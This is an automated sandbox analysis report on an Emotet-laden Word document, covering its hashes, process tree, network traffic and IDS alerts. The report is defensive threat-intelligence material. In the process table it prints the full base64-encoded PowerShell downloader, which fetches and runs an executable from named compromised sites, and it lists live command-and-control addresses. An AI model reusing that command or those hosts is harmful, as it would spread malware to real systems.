analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2019-05-098226-713.doc

Full analysis: https://app.any.run/tasks/77e9b387-8c3b-49c4-ab7c-e0544f9b5a9f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 24, 2019, 03:53:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
feodo
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: real-time, Subject: Senior, Author: Zaria Doyle, Comments: Sao Tome and Principe Mountains, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 13:40:00 2019, Last Saved Time/Date: Mon May 20 13:40:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 65, Security: 0
MD5:

BB1BCD419808241BB452DC4FE97FBFF2

SHA1:

7449D7A54EE1802A5285C6EE02713063FDC40089

SHA256:

7BFB8D4058D7369BACEB8E41BE5F6BF6CD3937A6E07177A90391EA1433EE6C95

SSDEEP:

3072:N77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qvgmIXkQA2:N77HUUUUUUUUUUUUUUUUUUUT52VLDXkW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 764.exe (PID: 3112)
      • 764.exe (PID: 3972)
      • soundser.exe (PID: 2744)
      • soundser.exe (PID: 2412)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2796)
    • Connects to CnC server

      • soundser.exe (PID: 2744)
    • Emotet process was detected

      • soundser.exe (PID: 2412)
    • EMOTET was detected

      • soundser.exe (PID: 2744)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2796)
      • 764.exe (PID: 3972)
    • PowerShell script executed

      • powershell.exe (PID: 2796)
    • Executed via WMI

      • powershell.exe (PID: 2796)
    • Creates files in the user directory

      • powershell.exe (PID: 2796)
    • Starts itself from another location

      • 764.exe (PID: 3972)
    • Connects to server without host name

      • soundser.exe (PID: 2744)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2556)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2556)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: real-time
Subject: Senior
Author: Zaria Doyle
Keywords: -
Comments: Sao Tome and Principe Mountains
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 12:40:00
ModifyDate: 2019:05:20 12:40:00
Pages: 1
Words: 11
Characters: 65
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Stehr - Weissnat
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 75
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Strosin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 764.exe no specs 764.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
2556"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019-05-098226-713.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2796powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABSADEAOABfADQAOAAxADAAPQAnAGIAMQAzAF8ANQAyADMAMwAnADsAJABCADEAOQA5ADYANgA2ADgAIAA9ACAAJwA3ADYANAAnADsAJABuADIANAAwADgAMgA3AD0AJwBOADYAMQAzADEANgA2ACcAOwAkAFcANwAwADMAMgA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABCADEAOQA5ADYANgA2ADgAKwAnAC4AZQB4AGUAJwA7ACQARwAzADQAMAAyADUAPQAnAHAANAA1ADQAMwBfADYANQAnADsAJABZADkANwA1ADUAXwA0ADgAPQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AYABlAGAAVAAuAHcAZQBiAGMATABpAEUATgBUADsAJABQADcANwAxADMAMAA5AD0AJwBoAHQAdABwADoALwAvAHMAZQBvAGcAbwBvAGQALgBuAGUAdAAvAHcAcAAvAGIANABwAHgAcgBlADYAMwAwADQALwBAAGgAdAB0AHAAOgAvAC8AYQBnAHIAbwAtAG0AaQBsAGwAZQBuAGkAYQBsAC4AYwBvAG0ALwBzAGUAdAB1AHAAYwBvAG4AZgBpAGcAbwAvADAAcwB0ADkAMwA3ADYALwBAAGgAdAB0AHAAcwA6AC8ALwBwAHIAbwB5AGUAYwB0AG8AbgBvAHYAaQBlAG0AYgByAGUALgBjAG8AbQAvAFYAMgAuADAALgAwAC8ANwBvAHUAdgB1ADQANwAvAEAAaAB0AHQAcAA6AC8ALwByAG8AeQBhAGwAYQBtAGUAcgBpAGMAYQBuAGMAbwBuAHMAdAByAHUAYwB0AGkAbwBuAC4AYwBvAG0ALwBmAHcAbQBpAGgAZQAvADAANABxAGYANgB1AHkAMAAvAEAAaAB0AHQAcAA6AC8ALwBmAGEAcgBvAGQAZQBiAGEAYgBlAGwALgBjAG8AbQAvADQAeABoAHoAdgBkADcALwBuAGwAMQAyAC8AJwAuAFMAcABMAGkAVAAoACcAQAAnACkAOwAkAFEAMQA3ADcANgA3ADUANgA9ACcAegBfADAANwA4AF8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAGoAMQA5ADMANgAyADUAIABpAG4AIAAkAFAANwA3ADEAMwAwADkAKQB7AHQAcgB5AHsAJABZADkANwA1ADUAXwA0ADgALgBEAG8AdwBOAGwATwBhAGQAZgBJAEwAZQAoACQAagAxADkAMwA2ADIANQAsACAAJABXADcAMAAzADIAOQApADsAJABKADAAXwBfADAAMAA0ADMAPQAnAHcANwA3ADAANgA3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVwA3ADAAMwAyADkAKQAuAGwARQBuAEcAVABIACAALQBnAGUAIAAyADMANgA0ADMAKQAgAHsAJgAoACcASQBuACcAKwAnAHYAbwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAgACQAVwA3ADAAMwAyADkAOwAkAGIAOAA4ADYAOAA1ADAAMAA9ACcAbwA3ADQANAA3ADMAOQAnADsAYgByAGUAYQBrADsAJABKADkANAAzADkAMwA2AD0AJwBHADUANAA1ADQAMwAyACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAMwA3ADEAXwA1ADkAPQAnAGoANABfADcAOQA3ADAAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3112"C:\Users\admin\764.exe" C:\Users\admin\764.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3972--195238b3C:\Users\admin\764.exe
764.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2412"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
764.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2744--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 708
Read events
1 227
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
2556WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4019.tmp.cvr
MD5:
SHA256:
2796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6C4WCQ0JTWX7FL8P7V57.temp
MD5:
SHA256:
2556WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B19FF5CEFD1DA5D0F2805A945B570C3C
SHA256:F75A592B67565D406D9D7F15EC8C276CD6D0D5E54AD5EF87413F565E44175FC9
2556WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:0A6D017330915218429B5323262BC792
SHA256:120575D1D6F7E321B56D848A9C8C50743CEF57CC40E1E9BF06571F8DA3229B0B
2556WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\473EE65E.wmfwmf
MD5:AB99CD6C3E51136317D524306FE6B9ED
SHA256:F697A33906B13AEF33B9F1952730ABF07FCEC6DAB7F3C82995229549EC0A0230
2556WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D12624B.wmfwmf
MD5:8C257D2305A61716DDDA2B9285B21A06
SHA256:B0547898DAC73E92C6750606DDD0DF00AE4AEDF46EF472DCA8B40E33148A90AF
2796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134ac8.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2556WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A66BDFD0.wmfwmf
MD5:BF53C379B98D5E7E76247663F031A6EF
SHA256:C4785E178C302245F15159D845F9F2146FBCF85CED0F90E9882D37F145C3954A
2556WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$19-05-098226-713.docpgc
MD5:445A6B1A3E4E18B3A165D26343FC7533
SHA256:BB1B98E530A46F741D2DD8876C8F0B952901CFB0F9B2D87F7A78F95BE963D7D4
2556WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49F73D91.wmfwmf
MD5:EC4261AED6E736243D6EE6B8B67FA6EE
SHA256:A4BB94776438D28EAC29BBB6BF00ACC04AF93D882ED479D907076129BB1FEA9D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
6
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2796
powershell.exe
GET
301
210.211.111.85:80
http://seogood.net/wp/b4pxre6304/
VN
suspicious
2744
soundser.exe
POST
80.0.106.83:80
http://80.0.106.83/sym/ban/
GB
malicious
2796
powershell.exe
GET
200
178.238.227.65:80
http://agro-millenial.com/setupconfigo/0st9376/
DE
executable
74.0 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2744
soundser.exe
80.0.106.83:80
Virgin Media Limited
GB
malicious
2744
soundser.exe
81.143.213.156:7080
British Telecommunications PLC
GB
malicious
2796
powershell.exe
210.211.111.85:443
seogood.net
CHT Compamy Ltd
VN
suspicious
2796
powershell.exe
178.238.227.65:80
agro-millenial.com
Contabo GmbH
DE
suspicious
2796
powershell.exe
210.211.111.85:80
seogood.net
CHT Compamy Ltd
VN
suspicious

DNS requests

Domain
IP
Reputation
seogood.net
  • 210.211.111.85
suspicious
agro-millenial.com
  • 178.238.227.65
suspicious

Threats

PID
Process
Class
Message
2796
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
2796
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
2796
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
2796
powershell.exe
Generic Protocol Command Decode
SURICATA TLS invalid record type
2796
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2796
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2796
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2744
soundser.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 22
No debug info